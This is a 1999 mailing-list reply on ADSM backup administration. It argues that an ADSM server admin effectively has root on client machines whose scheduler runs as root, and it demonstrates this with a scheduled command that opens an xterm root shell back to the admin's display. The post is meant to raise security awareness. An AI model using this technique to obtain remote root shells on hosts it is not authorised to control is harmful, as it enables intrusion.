=> On Fri, 8 Oct 1999 08:56:18 +1000, Trevor Foley <Trevor.Foley AT 
BANKERSTRUST.COM DOT AU> said:

> G'day,

> I'll offer the opposite argument.

> I am responsible for the ADSM servers at our site. There are over 200 NT
> servers at ADSM clients, and I don't have, need, or want, admin rights to
> them. The same applices to all of our Unix boxes.
[ ... ]
> Someone needs admin rights on the NT box to setup/support ADSM. But it
> doesn't have to be the ADSM server administrator.


What is not necessarily obvious at first glance is that you, the ADSM admin,
_do_ have administrator rights if

a) the scheduler is running and

b) the scheduler is running as administrator (root/whatever)

through your capacity to perform scheduled actions of type 'command', you can
do just about anything.  Just for giggles, try this some time: Set up a
schedule of type 'command' for one of your UNIX nodes.  Make the 'objects'
field


/usr/bin/hostname > /var/tmp/adsm-foo-blah
(the location of the 'hostname' program could vary on your system)


Now try one with

/usr/openwin/bin/xterm -display yourmachine.your.domain:0
( if you use X, that is )

Wander around that root shell, but DON'T TOUCH ANYTHING.  Unless you already
have root there anyway.


Now go think about security. :)


Allen S. Rout